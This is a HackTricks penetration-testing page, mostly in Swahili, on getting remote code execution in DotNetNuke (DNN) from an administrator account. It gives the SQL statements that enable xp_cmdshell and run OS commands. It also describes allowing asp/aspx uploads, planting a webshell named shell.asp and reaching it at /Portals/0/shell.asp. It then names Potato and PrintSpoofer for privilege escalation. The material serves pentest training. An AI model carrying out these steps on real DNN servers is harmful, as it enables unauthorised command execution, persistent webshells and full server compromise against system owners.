DotNetNuke (DNN)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DotNetNuke (DNN)

Ikiwa unaingia kama meneja katika DNN ni rahisi kupata RCE.

RCE

Kupitia SQL

Konsoli ya SQL inapatikana chini ya ukurasa wa Settings ambapo unaweza kuwezesha xp_cmdshell na kufanya amri za mfumo wa uendeshaji.

Tumia mistari hii kuwezesha xp_cmdshell:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

Na bonyeza "Run Script" ili kuendesha hizo sentensi za sQL.

Kisha, tumia kitu kama ifuatavyo kuendesha amri za OS:

xp_cmdshell 'whoami'

Kupitia ASP webshell

Katika Settings -> Security -> More -> More Security Settings unaweza kuongeza nyongeza mpya zinazoruhusiwa chini ya Allowable File Extensions, na kisha kubonyeza kitufe cha Save.

Ongeza asp au aspx na kisha katika /admin/file-management pakia asp webshell inayoitwa shell.asp kwa mfano.

Kisha upate /Portals/0/shell.asp ili kufikia webshell yako.

Kuinua Haki

Unaweza kuinua haki kwa kutumia Potatoes au PrintSpoofer kwa mfano.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousCGI NextDrupal

Last updated 8 days ago